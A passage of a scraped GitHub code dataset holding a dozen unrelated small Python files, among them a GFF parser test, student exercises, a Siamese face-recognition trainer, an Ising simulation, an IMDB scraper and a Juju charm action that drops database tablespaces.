\"\")\n false_gff.read_gff_file()\n\n false_gff.scan_gff_for_errors()\n\n self.assertEqual(4, len(false_gff.errors))\n scaffold_error = false_gff.errors[\"f18e9140-5589-405b-86c3-0e54cf01390d\"]\n self.assertEqual(1, len(scaffold_error.gff_format_error))\n self.assertEqual(\"simple@ebi.ac.uk\", scaffold_error.owner)\n self.assertEqual(\"sand_box\", scaffold_error.organism_name)\n self.assertEqual(\"6c797cb7-1246-4add-aab4-a3287a12d27a\", scaffold_error.gene_id)\n self.assertEqual(\"8c5922b3-fe26-49dc-8aeb-9ac867b96c07\", scaffold_error.mrna_id)\n self.assertEqual(\"AGAP010269\", scaffold_error.gene_name)\n self.assertEqual(\"3R:51887721..51894443\", scaffold_error.locus)\n self.assertEqual(\n \"scaffold\", scaffold_error.gff_format_error[0].get(\"field_type\")\n )\n self.assertEqual(\"exon\", scaffold_error.gff_format_error[0].get(\"feature_type\"))\n self.assertEqual(\n \"f18e9140-5589-405b-86c3-0e54cf01390d\",\n scaffold_error.gff_format_error[0].get(\"feature_id\"),\n )\n self.assertEqual(\"2R\", scaffold_error.gff_format_error[0].get(\"feature_value\"))\n self.assertEqual(\n \"8c5922b3-fe26-49dc-8aeb-9ac867b96c07\",\n scaffold_error.gff_format_error[0].get(\"parent_id\"),\n )\n self.assertEqual(\"3R\", scaffold_error.gff_format_error[0].get(\"parent_value\"))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"VEuPathDB/apollo_email_report","sub_path":"test/test_gff_file.py","file_name":"test_gff_file.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18252240350","text":"from Cliente import Cliente\nfrom ContaCorrente import ContaCorrente\n\nlista = []\nwhile True:\n numeroConta = input(\"Digite seu número da conta: \")\n if numeroConta == \"0\":\n break\n saldo = float(input(\"Digite seu saldo: \"))\n nome = input(\"Digite seu nome: \")\n cpf = input(\"Digite seu cpf: \")\n\n cliente = Cliente(nome, cpf)\n contacorrente = ContaCorrente(numeroConta, saldo, cliente)\n\n lista.append(contacorrente)\n\nprint('')\nnumconta = input(\"Digite numero da conta: \")\n\nconta_existe = False\nfor conta in lista:\n if conta.numeroConta == numconta:\n conta_existe = True\n\nif conta_existe:\n for conta in lista:\n if conta.numeroConta == numconta:\n print(conta.exibirDados())\n operação = int(input(\"1 - para SACAR e 2 - para DEPOSITAR: \"))\n\n if operação == 1:\n valorSaque = float(input(\"Quanto deseja sacar: \")) \n if conta.sacar(valorSaque) == True:\n print(f\"Saque realizado com sucesso. Saldo atual {conta.saldo}\")\n else:\n print(f\"Saque não realizado. Saldo atual {conta.saldo}\")\n if operação == 2:\n valorDeposito = float(input(\"Quanto deseja depositar: \"))\n if conta.depositar(valorDeposito) == True:\n print(f\"Depósito realizado com sucesso. Saldo atual {conta.saldo}\")\n else:\n print(f\"Depósito não realizado. Saldo atual {conta.saldo}\")\nelse:\n print(\"conta n existe\")\n\nprint(\"\")\nsaldodetodos = 0\nif len(lista) > 0:\n for conta in lista:\n saldodetodos += conta.saldo\n print(f\"Saldo de todas as contas: {saldodetodos}\")\n\n maior = -1\n for conta in lista:\n if conta.saldo > maior:\n maior = conta.saldo\n print(f\"Maior saldo: {maior}\")\n\n menor = 9999999\n for conta in lista:\n if conta.saldo < menor:\n menor = conta.saldo\n print(f\"Menor saldo: {menor}\")\n","repo_name":"a1ramm/Programacao-I","sub_path":"contacorrente/TesteContaCorrente.py","file_name":"TesteContaCorrente.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34363995212","text":"\"\"\"Send a message.\"\"\"\r\n\r\n\r\nimport eospyo\r\n\r\n\r\ndata = [\r\n # Not specifying an account with the \"to\" field will send the message to the same account sending it in the \"from\" field\r\n eospyo.Data(name=\"from\", value=eospyo.types.Name(\"me.wam\")),\r\n eospyo.Data(\r\n name=\"message\",\r\n value=eospyo.types.String(\"hello from eospyo\"), # String specified for message type, type must be specificed\r\n ),\r\n]\r\n\r\nauth = eospyo.Authorization(actor=\"me.wam\", permission=\"active\")\r\n\r\naction = eospyo.Action(\r\n account=\"me.wam\",\r\n name=\"sendmsg\",\r\n data=data,\r\n authorization=[auth],\r\n)\r\n\r\nraw_transaction = eospyo.Transaction(actions=[action])\r\n\r\nnet = eospyo.Local()\r\nlinked_transaction = raw_transaction.link(net=net)\r\n\r\nkey = \"a_very_secret_key\"\r\nsigned_transaction = linked_transaction.sign(key=key)\r\n\r\nresp = signed_transaction.send()\r\n","repo_name":"FACINGS/eospyo","sub_path":"examples/send_message.py","file_name":"send_message.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"} +{"seq_id":"30836783963","text":"from art import logo\n\nprint(logo)\n\nprint(\"Welcome to the secret auction program.\\n\")\nbid_dictionary = {}\nis_Continue = False\n\n\ndef find_highest_bidder(bidding_record):\n highest_bid = 0\n winner = \"\"\n # bidding_record = {\"matthew\":222, \"daniel\":333 }\n for bidder in bidding_record:\n bid_amount = bidding_record[bidder]\n if bid_amount > highest_bid:\n highest_bid = bid_amount\n winner = bidder\n print(f\"The winner is {winner} with a bid of ${highest_bid}\")\n\n\nwhile not is_Continue:\n name = input(\"What is your name?: \")\n bid = int(input(\"What's your bid?: $\"))\n bid_dictionary[name] = bid\n\n other_Bidder = input(\"Are there any other bidders? Type 'yes' or 'no'.\").lower()\n if other_Bidder == 'no':\n is_Continue = True\n find_highest_bidder(bid_dictionary)\n\n\nprint(bid_dictionary)\n\n# max_value = max(bid_dictionary.values())\n# print(max_value)\n","repo_name":"NinoosMoshi/python-100Days","sub_path":"day-9/bid_project.py","file_name":"bid_project.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71415694545","text":"import tensorflow as tf\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport random\nfrom tensorflow.keras.layers import Input, Conv2D, MaxPooling2D, Flatten, Dense, Layer\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.metrics import Precision, Recall\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nANC_PATH = '/home/carlos/Documentos/reconhecimentoFace/FaceRecognition/data/anchor'\nPOS_PATH = '/home/carlos/Documentos/reconhecimentoFace/FaceRecognition/data/positive'\nNEG_PATH = '/home/carlos/Documentos/reconhecimentoFace/FaceRecognition/data/negative'\n\n# Use barras invertidas simples para formar o caminho\nanchor = tf.data.Dataset.list_files(ANC_PATH + '/*.jpg').take(300)\npositive = tf.data.Dataset.list_files(POS_PATH + '/*.jpg').take(300)\nnegative = tf.data.Dataset.list_files(NEG_PATH + '/*.jpg').take(300)\n#Pré-processamento\n# Redimencionando tamanho das imagens para treinamento. O modelo de rede neural aceita imagens até 150x150. Nesse caso estamos redimensinando para 100x100\ndef preprocess(file_path):\n \n # Read in image from file path\n byte_img = tf.io.read_file(file_path)\n # Load in the image \n img = tf.io.decode_jpeg(byte_img)\n \n # Preprocessing steps - resizing the image to be 100x100x3\n img = tf.image.resize(img, (100,100))\n # Scale image to be between 0 and 1 \n img = img / 255.0\n\n # Return image\n return img\n#Pré-processamento\n# Criando datasets rotulados: positive = 1 e negative = 0. Se a imagem for reconhecida como negativa,ou seja, não é uma face reconhecida, a resposta será 0.\npositives = tf.data.Dataset.zip((anchor, positive, tf.data.Dataset.from_tensor_slices(tf.ones(len(anchor)))))\nnegatives = tf.data.Dataset.zip((anchor, negative, tf.data.Dataset.from_tensor_slices(tf.zeros(len(anchor)))))\ndata = positives.concatenate(negatives)\n\n\nsamples = data.as_numpy_iterator()\nexampple = samples.next()\nprint (exampple)\n\n\n\n#Pré-processamento\n# Particionando dados para treino e teste\ndef preprocess_twin(input_img, validation_img, label):\n return(preprocess(input_img), preprocess(validation_img), label)\nres = preprocess_twin(*exampple)\nplt.imshow(res[1])\n#Captura uma imagem e mostra o label \nprint(res[2])\n\n# Dataloader Iterator - Para carregar as imagens e conferir se a classificação esta correta\n# Build dataloader pipeline\ndata = data.map(preprocess_twin)\ndata = data.cache()\ndata = data.shuffle(buffer_size=10000)\n\nsamples = data.as_numpy_iterator()\nlen(samples.next())\nsam = samples.next()\nplt.imshow(sam[1])\n#Captura uma imagem e mostra o label \nprint(sam[2])\n\n# Separando partição de treinamento\n# Treinamnento esta em 70% dos dados disponibilizados\ntrain_data = data.take(round(len(data)*.7))\n# Batch esta em 16\ntrain_data = train_data.batch(8)\n# Carrega 8 quadros em memória antes de rodar o batch novamente\ntrain_data = train_data.prefetch(8)\n\n# Separando partição de teste\n# O teste esta em 30% dos dados disponibilizados\ntest_data = data.skip(round(len(data)*.7))\ntest_data = test_data.take(round(len(data)*.3))\n# Batch esta em 16\ntest_data = test_data.batch(8)\n# Carrega 8 quadros em memória antes de rodar o batch novamente\ntest_data = test_data.prefetch(8)\n\n#Construindo camada completa \ndef make_embedding(): \n inp = Input(shape=(100,100,3), name='input_image') \n # First block\n c1 = Conv2D(64, (10,10), activation='relu')(inp)\n m1 = MaxPooling2D(64, (2,2), padding='same')(c1) \n # Second block\n c2 = Conv2D(128, (7,7), activation='relu')(m1)\n m2 = MaxPooling2D(64, (2,2), padding='same')(c2) \n # Third block \n c3 = Conv2D(128, (4,4), activation='relu')(m2)\n m3 = MaxPooling2D(64, (2,2), padding='same')(c3) \n # Final embedding block\n c4 = Conv2D(256, (4,4), activation='relu')(m3)\n f1 = Flatten()(c4)\n d1 = Dense(4096, activation='sigmoid')(f1) \n return Model(inputs=[inp], outputs=[d1], name='embedding')\n\n#Chamando o metodo\nembedding = make_embedding()\nembedding.summary()\n\n# Construindo camada de distância\n# Classe de distância siamesa L1\nclass L1Dist(Layer):\n \n # Iniciando o método - herança\n def __init__(self, **kwargs):\n super().__init__()\n \n # Calculando similaridades\n def call(self, input_embedding, validation_embedding):\n return tf.math.abs(input_embedding - validation_embedding)\n\nl1 = L1Dist()\n\n# Montando método de modelo siamês\ndef make_siamese_model(): \n \n # Anchor image input in the network\n input_image = Input(name='input_img', shape=(100,100,3))\n \n # Validation image in the network \n validation_image = Input(name='validation_img', shape=(100,100,3))\n \n # Combine siamese distance components\n siamese_layer = L1Dist()\n siamese_layer._name = 'distance'\n distances = siamese_layer(embedding(input_image), embedding(validation_image))\n \n # Classification layer \n classifier = Dense(1, activation='sigmoid')(distances)\n \n return Model(inputs=[input_image, validation_image], outputs=classifier, name='SiameseNetwork')\n\nsiamese_model = make_siamese_model()\nsiamese_model.summary()\n\nprint(\"O código foi pausado para verificação dos summary. Digite '1' para continuar:\")\nuser_input = input()\n\nif user_input == '1':\n print(\"Continuando o código...\")\n\n #Configuração de perda(loss) e optimizador\n binary_cross_loss = tf.losses.BinaryCrossentropy()\n opt = tf.keras.optimizers.Adam(1e-4) # 0.0001\n #Estabelecendo Checkpoints de treinamento\n checkpoint_dir = '/home/carlos/Documentos/reconhecimentoFace/FaceRecognition/training_checkpoints'\n checkpoint_prefix = os.path.join(checkpoint_dir, 'ckpt')\n checkpoint = tf.train.Checkpoint(opt=opt, siamese_model=siamese_model)\n\n #Construindo a função de treinamento\n @tf.function\n def train_step(batch):\n \n # Record all of our operations \n with tf.GradientTape() as tape: \n # Get anchor and positive/negative image\n X = batch[:2]\n # Get label\n y = batch[2]\n \n # Forward pass\n yhat = siamese_model(X, training=True)\n # Calculate loss\n loss = binary_cross_loss(y, yhat)\n print(loss)\n \n # Calculate gradients\n grad = tape.gradient(loss, siamese_model.trainable_variables)\n \n # Calculate updated weights and apply to siamese model\n opt.apply_gradients(zip(grad, siamese_model.trainable_variables))\n \n # Return loss\n return loss\n \n\n def train(data, EPOCHS):\n # Loop through epochs\n for epoch in range(1, EPOCHS+1):\n print('\\n Epoch {}/{}'.format(epoch, EPOCHS))\n progbar = tf.keras.utils.Progbar(len(data))\n \n # Creating a metric object \n r = Recall()\n p = Precision()\n \n # Loop through each batch\n for idx, batch in enumerate(data):\n # Run train step here\n loss = train_step(batch)\n yhat = siamese_model.predict(batch[:2])\n r.update_state(batch[2], yhat)\n p.update_state(batch[2], yhat) \n progbar.update(idx+1)\n print(loss.numpy(), r.result().numpy(), p.result().numpy())\n \n # Save checkpoints\n if epoch % 10 == 0: \n checkpoint.save(file_prefix=checkpoint_prefix)\n\n # Treinando o modelo\n print(\"Digite a quantidade de épocas para treinamento: \")\n epoch_input = input()\n\n try:\n # Converta a entrada do usuário em um número inteiro\n epochs = int(epoch_input)\n \n # Verifique se o número de épocas é válido (maior que zero)\n if epochs > 0:\n train(train_data, epochs)\n else:\n print(\"O número de épocas deve ser maior que zero.\")\n except ValueError:\n print(\"Entrada inválida. Por favor, insira um número inteiro válido para as épocas.\")\n\nelse:\n print(\"Comando inválido. O código será encerrado.\")\n\n\n","repo_name":"CarlosNobuaki/reconhecimentoFace","sub_path":"preprocessamentoTreinamento.py","file_name":"preprocessamentoTreinamento.py","file_ext":"py","file_size_in_byte":8056,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35964284339","text":"\n# coding: utf-8\n\n# In[56]:\n\n\n# Code Mark 1.7: Ising Model in 2D\n\n# Importing all the necessary packages I will use:\nimport numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\nimport numpy.random as rnd\n\n# Before I do anything I need to make sure the specifics of the size of the lattice as a 12x12 sized, number of steps, number of temperature points used, number of points in order to reach an equilibrium state are all accounted for\nnum=240\nsteps_monte=150\ntemp_points=100\nsteps_equil=150\nnum_a=1/(steps_monte*(num**2))\nnum_b=1/((steps_monte**2)*(num**2))\n\n# Next I must create an intitial spin state for my molecule: with 2 different values e.g. (-1,1) or (0,1) etc.\ndef startspin(num): \n spin=rnd.randint(2,size=(num,num))-1\n return spin\n\n# Now I need to define the energy function. This will give the energy of any given spin state:\ndef Energy(Q):\n starting_energy=0\n for i in range(len(Q)):\n for j in range(len(Q)):\n g=Q[i,j]\n n_y=Q[(i+1)%num,j]+Q[i,(j+1)%num]+Q[(i-1)%num,j]+Q[i,(j-1)%num]\n starting_energy+=g*-n_y\n return starting_energy/4\n\n# Now I need to code the Monte Carlo Steps with Metro ALgorithm for the ising model:\ndef montestep(Q,P):\n for i in range(num):\n for j in range(num):\n x=rnd.randint(0,num)\n y=rnd.randint(0,num)\n z=Q[x,y]\n n_y=Q[(x+1)%num,y]+Q[x,(y+1)%num]+Q[(x-1)%num,y]+Q[x,(y-1)%num]\n l=2*z*n_y\n if l<0:\n z*=-1\n elif rnd.rand()0.5)&(Temp<5)] \ntemp_points=np.size(Temp)\n\n# I need to define 0 points for each of the 4 physical quantities I wish to find:\nMagnetization=np.zeros(temp_points)\nSpecificHeat=np.zeros(temp_points) \nEnergy=np.zeros(temp_points)\nSusceptibility=np.zeros(temp_points)\n\n# Now I need to implement each function above by creating an Ising Function with them:\nfor i in range(len(Temp)):\n E_a=M_a=0\n E_b=M_b=0\n Q=startspin(num)\n init_Temp_a=1/Temp[i] \n init_Temp_b=init_Temp_a**2\n\n for j in range(steps_monte):\n montestep(Q,init_Temp_a) \n Energy_calc=Energy[Q] \n Mag_calc=Magnetization[Q] \n E_a=E_a+(Energy_calc)\n M_a=M_a+(Mag_calc)\n M_b=M_b+(Mag_calc**2)\n E_b=E_b+(Energy_calc**2)\n Magnetization[j]=num_a*M_a[i][j]\n SpecificHeat[j]=(num_a*E_b[i][j]*(E_a[i][j]**2))*init_Temp_b\n Susceptibility[j]=(num_a*M_b[i][j]*(M_a[i][j]**2))*init_Temp_a\n Energy[j]=num_a*E_a[i][j]\n\n for k in range(steps_equil): \n montestep(Q,init_Temp_a) \n \n#Finally I can plot the 4 graphs I need to show the monte carlo steps of the ising model and can then conduct my research thereafter.\n \nplt.plot(Temp, Energy,'d', color=\"#8A2BE2\")\nplt.xlabel(\"Temperature (Kelvin)\")\nplt.ylabel(\"Energy (Arbitrary Units)\")\nplt.show()\n\nplt.plot(Temp, abs(Magnetization),'x', color=\"#7FFF00\")\nplt.xlabel(\"Temperature (Kelvin)\")\nplt.ylabel(\"Magnetization (Arbitrary Units)\")\nplt.show()\n\nplt.plot(Temp, SpecificHeat, 'd', color=\"#00FFFF\")\nplt.xlabel(\"Temperature (Kelvin)\")\nplt.ylabel(\"Specific Heat (Arbitrary Units)\")\nplt.show()\n\nplt.plot(Temp, Susceptibility, 'x', color=\"#0000FF\")\nplt.xlabel(\"Temperature (Kelvin)\")\nplt.ylabel(\"Susceptibility (Arbitrary Units)\")\nplt.show()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Brannoco/Ising","sub_path":"Ising+Model+Oisin+Brannock.py","file_name":"Ising+Model+Oisin+Brannock.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30992424595","text":"import time\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport random\nfrom pylsl import StreamInfo, StreamOutlet\n\n# function to move box\ndef move_box(dx, dy):\n x, y = box.get_xy()\n box.set_xy((x+dx, y+dy))\n fig.canvas.draw_idle()\n\n# register key press event handlers\ndef on_press(event):\n if event.key == 'left':\n move_box(-0.1, 0)\n elif event.key == 'right':\n move_box(0.1, 0)\n elif event.key == 'up':\n \n move_box(0, 0.1)\n trail_text.set_text(f\"Trail : {1}\")\n \n elif event.key == 'down':\n move_box(0, -0.1)\n \nif __name__ == '__main__':\n fontsize = 30 #fontsize\n matplotlib.rcParams.update({'font.size': fontsize})\n\n fig, ax = plt.subplots(figsize=(7,7)) #figure and axes\n \n fig.set_facecolor('black')#black background color\n ax.set_xlim(-1, 1)#axis goes from -1 to 1\n ax.set_ylim(-1, 1)\n\n ax.axvline(0, color='red')#red lines\n ax.axhline(0, color='red')\n\n box = plt.Rectangle((0,0), 0.2, 0.2, facecolor='blue', edgecolor='white')\n ax.add_patch(box)\n # create text object at top of plot\n text = ax.text(0, 1, 'Right', ha='center', va='bottom', color='white')\n trail_text = ax.text(-1, -1, f\"Trail : {0}\", ha='left', va='bottom', color='black')\n\n fig.canvas.mpl_connect('key_press_event', on_press)\n plt.xlim(xmin=-1.5, xmax=1.5)\n plt.ylim(ymin=-1.5, ymax=1.5)\n plt.show()\n \n ","repo_name":"adamaske/Brain_Bridge_Pain","sub_path":"Motor_Imagery/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74159049104","text":"\"\"\"\nHow to reverse String in Java using Iteration and Recursion?\n\n\"\"\"\n\nstr = \"I like jam.\"\n\ndef reverse_string(s):\n new_str = \"\"\n s = list(s)\n\n for i in range(len(s)):\n # This needed for the reverce loop.\n char = s[len(s)- 1 - i]\n new_str = new_str + char\n\n print(new_str)\n\nreverse_string(str)\n\n\n# solution 2: recursion\n\ndef reverse(str):\n if str == \"\":\n return str\n else:\n return str[-1] + reverse(str[:-1])\n\nprint(reverse(str))\n\n\n# solution3: ???\nbackward = lambda str: str[-1] + backward(str[:-1]) if str else str\n\nprint(backward)","repo_name":"ksenia-b/Technical-Interview","sub_path":"string/reverse_string.py","file_name":"reverse_string.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1755355287","text":"import os\nimport sys\nimport pathlib\nimport re\nimport xml.etree.ElementTree as Xml\n\n\ndef parse_id(coord: str) -> (str, str):\n m = rx_coord.match(coord)\n if m is None:\n print(\n 'Invalid format: %s; must be {x,y} (braces can be omitted).' % coord\n )\n return None\n return m.group(1, 2)\n\n\ndef find_text(coord):\n (pid, tid) = parse_id(coord)\n t = root.find(f'./page[@id=\"{pid}\"]/t[@id=\"{tid}\"]')\n if t is None:\n return None\n print('{%s,%s} => %s' % (pid, tid, t.text))\n return t.text\n\n\nif len(sys.argv) < 2:\n print(f'{os.path.basename(__file__)} [language-code]')\n print(\"\"\"\n Language codes:\n 88 - Chinese, Traditional\n 86 - Chinese, Simplified\n 82 - Korean\n 81 - Japanese\n 55 - Portuguese\n 49 - German\n 48 - Polish\n 44 - English\n 42 - Czech\n 39 - Italian\n 34 - Spanish\n 33 - French\n 07 - Russian\n\n \"\"\")\n exit(1)\n\n# Path to root of unpacked resource files\n# X4SRC = '../../unpacked'\n# X4SRC = 'E:/Games/X-Universe/X4/modding/unpacked/t/0001-L044.xml'\n\nLANG = 44\nX4SRC = sys.argv[1]\nif len(sys.argv) >= 3:\n LANG = sys.argv[2]\n\nrx_coord = re.compile(r'{?\\s*(\\d+)\\s*,\\s*(\\d+)\\s*\\}?')\nrx_id = re.compile(r'({\\s*\\d+\\s*,\\s*\\d+\\s*\\})')\n\nfilepath = pathlib.Path(__file__).parent.absolute()\nlang_file = f't/0001-L0{LANG}.xml'\nfilepath = filepath.joinpath(X4SRC, lang_file)\nfilepath = filepath.resolve()\nif not filepath.exists():\n print('file not found: ', filepath)\n exit(1)\n\nprint('loading file...')\ntree = Xml.parse(filepath)\nroot = tree.getroot()\nprint('ready.')\n\nwhile True:\n cmd = input('{} ')\n if 'exit' == cmd.lower():\n break\n\n sids = [cmd]\n while sids:\n nr = []\n for sid in sids:\n if not sid:\n continue\n text = find_text(sid)\n if text is None:\n print('%s not found' % sid)\n continue\n matches = rx_id.findall(text)\n if matches:\n nr += matches\n sids = nr\n if not sids:\n print()\n","repo_name":"eidng8/x4-mods","sub_path":"text-search.py","file_name":"text-search.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"72197922066","text":"import csv\nimport json\nimport requests\nfrom bs4 import BeautifulSoup\n\n\"\"\"\n 1. Obtener el maqueteo HTML\n - Si el archivo HTML no existe de forma local, crearlo\n - Si el archivo HTML existe de forma local, obtener su contenido\n 2. Obtener la informacion\n - Nombre\n - Categorias\n - Reparto\n 3. Generar archivo CSV\n\"\"\"\n\nURL = 'https://www.imdb.com/calendar/?region=MX'\n\ndef get_imdb_content():\n headers = {\n 'User-Agent': 'Mozilla/5.0'\n }\n \n response = requests.get(URL, headers=headers)\n if response.status_code == 200:\n return response.text\n \n return None\n\ndef get_imdb_file_local():\n content = None\n try:\n with open('imdb.html', 'r') as file:\n content = file.read()\n except:\n pass\n \n return content\n \ndef create_imdb_file_local(content):\n \n try:\n with open('imdb.html', 'w') as file:\n file.write(content)\n except:\n pass\n \n return content\n \ndef get_local_imdb_content():\n content = get_imdb_file_local()\n if content:\n create_imdb_file_local(content)\n return content\n\n\ndef create_movie(tag):\n main_div = tag.find('div', {'class': 'ipc-metadata-list-summary-item__c'})\n sub_div = main_div.find('div', {'class': 'ipc-metadata-list-summary-item__c'})\n name = main_div.div.a.text\n \n \n ul_categories= main_div.find('ul', {\n 'class': 'ipc-inline-list ipc-inline-list--show-dividers ipc-inline-list--no-wrap ipc-inline-list--inline ipc-metadata-list-summary-item__tl base'\n })\n \n ul_cast = main_div.find('ul', {\n 'class': 'ipc-inline-list ipc-inline-list--show-dividers ipc-inline-list--no-wrap ipc-inline-list--inline ipc-metadata-list-summary-item__stl base'\n })\n \n categories = [category.span.text for category in ul_categories.find_all('li')]\n \n \n cast = None\n \n cast = [ cast.span.text for cast in ul_cast.find_all('li') ] if ul_cast else []\n \n return (name, categories, cast)\n\n\ndef create_csv_movies_file(movies):\n with open('movies.csv', 'w') as file:\n writer = csv.writer(file, delimiter=\"-\")\n writer.writerow(['name', 'categories', 'cast'])\n \n for movie in movies:\n writer.writerow([\n movie[0],\n \",\".join(movie[1]), # Categories\n \",\".join(movie[2]), # Cast\n ]) \n \ndef create_json_movies_file(movies):\n movies_list = [\n {\n 'name': movie[0],\n 'categories': movie[1],\n 'cast': movie[2],\n }\n for movie in movies\n ]\n with open('movies.json', 'w', encoding='latin-1') as file:\n json.dump(movies_list, file, indent=4)\n\ndef main():\n content = get_imdb_content()\n \n soup = BeautifulSoup(content, 'html.parser')\n li_tags = soup.find_all('li', {\n 'data-testid': 'coming-soon-entry',\n 'class': 'ipc-metadata-list-summary-item ipc-metadata-list-summary-item--click sc-8c2b7f1f-0 bpqYIE'\n })\n \n movies = []\n for tag in li_tags:\n movie = create_movie(tag)\n movies.append(movie)\n \n create_csv_movies_file(movies)\n create_json_movies_file(movies)\n \n \nif __name__ == '__main__':\n main()","repo_name":"ioseluiz/imdb_scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27142961902","text":"#!/usr/bin/python\nimport subprocess\nimport sys\nimport os\nfrom subprocess import PIPE\n\n\nsys.path.append('hooks/')\n\nimport cplane_utils\n\nfrom charmhelpers.core.hookenv import (\n config,\n log,\n action_set,\n action_fail,\n)\n\nfrom cplane_utils import (\n set_oracle_env,\n configure_oracle_client,\n set_oracle_host,\n\n)\n\n\ndef execute_sql_command(connect_string, sql_command):\n session = subprocess.Popen(['sqlplus', '-S', connect_string], stdin=PIPE,\n stdout=PIPE, stderr=PIPE)\n session.stdin.write(sql_command)\n return session.communicate()\n\n\ndef drop_cplane_data(args):\n connect_string = ''\n if config('jboss-db-on-host'):\n set_oracle_env()\n connect_string = 'sys/' + config('oracle-password') + \\\n '@localhost/XE as sysdba'\n else:\n configure_oracle_client()\n oracle_host = set_oracle_host()\n if oracle_host:\n host = cplane_utils.ORACLE_HOST + '/'\n connect_string = 'sys/' + cplane_utils.DB_PASSWORD \\\n + '@' + host + cplane_utils.DB_SERVICE + ' as' \\\n + ' sysdba'\n else:\n action_set({'result-map.message': \"No Oracle Host found\"})\n\n log(\"Dropping user and tables spaces from DB\")\n log(connect_string)\n res = execute_sql_command(connect_string, \"drop user admin cascade;\")\n action_set({'result-map.message': res})\n res = execute_sql_command(connect_string, \"drop tablespace cp_tabs \\\nincluding contents and datafiles cascade constraints;\")\n action_set({'result-map.message': res})\n res = execute_sql_command(connect_string, \"drop tablespace cp_tabm \\\nincluding contents and datafiles cascade constraints;\")\n action_set({'result-map.message': res})\n res = execute_sql_command(connect_string, \"drop tablespace cp_tabl \\\nincluding contents and datafiles cascade constraints;\")\n action_set({'result-map.message': res})\n res = execute_sql_command(connect_string, \"drop tablespace cp_inds \\\nincluding contents and datafiles cascade constraints;\")\n action_set({'result-map.message': res})\n res = execute_sql_command(connect_string, \"drop tablespace cp_indm \\\nincluding contents and datafiles cascade constraints;\")\n action_set({'result-map.message': res})\n res = execute_sql_command(connect_string, \"drop tablespace cp_indl \\\nincluding contents and datafiles cascade constraints;\")\n action_set({'result-map.message': res})\n\nACTIONS = {\"drop-cplane-data\": drop_cplane_data}\n\n\ndef main(args):\n action_name = os.path.basename(args[0])\n try:\n action = ACTIONS[action_name]\n except KeyError:\n return \"Action %s undefined\" % action_name\n else:\n try:\n action(args)\n except Exception as e:\n action_fail(str(e))\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","repo_name":"cplane-networks/dvnd-juju","sub_path":"cplane-controller/actions/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"33847429128","text":"from __future__ import absolute_import\n\nimport numpy as np\n\nfrom six import itervalues, iteritems\nfrom six.moves import range, map, zip\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.cbook as cb\nimport matplotlib.colors as mcolors\nimport matplotlib.gridspec as mgridspec\nfrom matplotlib.colors import colorConverter\nfrom matplotlib.collections import PatchCollection, LineCollection, PolyCollection\nfrom matplotlib.patches import Arrow, FancyArrow\n\nfrom operator import itemgetter\n\nfrom . import make_toDataDir\ntoDataDir = make_toDataDir(__file__)\n\ntry:\n import pandas as pd\n from . import shapes as vshapes\n from shapely.geometry import MultiPolygon\n\n def flatten(it):\n for sh in it:\n if isinstance(sh, MultiPolygon):\n for p in sh:\n yield p\n else:\n yield sh\n\n def germany2(with_laender=False, ax=None, linewidth=10, **kwargs):\n if ax is None:\n ax = plt.gca()\n\n if with_laender:\n laender = LineCollection(map(vshapes.points, flatten(itervalues(vshapes.laender()))),\n colors=\"gray\", zorder=0, linewidths=linewidth)\n ax.add_collection(laender)\n line, = ax.plot(*vshapes.points(vshapes.germany()).T, color='k', linewidth=linewidth)\n line.set_zorder(1)\n\n def landkreise(data,\n colorbar=True, colorbar_ticklabels=None,\n norm=None, ax=None):\n \"\"\"\n Plot data on german Landkreis level. Needs a pandas Series with\n the corresponding regionalschluessel as index.\n\n Parameters\n ----------\n data : pd.Series\n Float valued data to be plotted.\n colorbar : bool | dict\n Whether to plot a colorbar and if a non-empty dict is\n passed extra kw arguments to pass to the colorbar call.\n colorbar_ticklabels : list of strings\n\n Returns\n -------\n collection : PolyCollection\n \"\"\"\n\n return shapes(vshapes.landkreise(), data=data,\n colorbar=colorbar, colorbar_ticklabels=colorbar_ticklabels,\n norm=norm, ax=ax)\n\n def shapes(shapes, data=None, colorbar=False, colorbar_ticklabels=None,\n norm=None, with_labels=False, edgecolors=None, facecolors=None,\n fontsize=None, ax=None, **kwds):\n \"\"\"\n Plot `data` on the basis of a dictionary of shapes. `data`\n must be given as a pandas Series with the corresponding keys\n of shapes as index.\n\n Parameters\n ----------\n shapes : dict | pd.Series\n Dictionary of shapes\n data : pd.Series\n Float valued data to be plotted. If data is omitted,\n np.arange(N) will be used.\n with_labels : bool\n 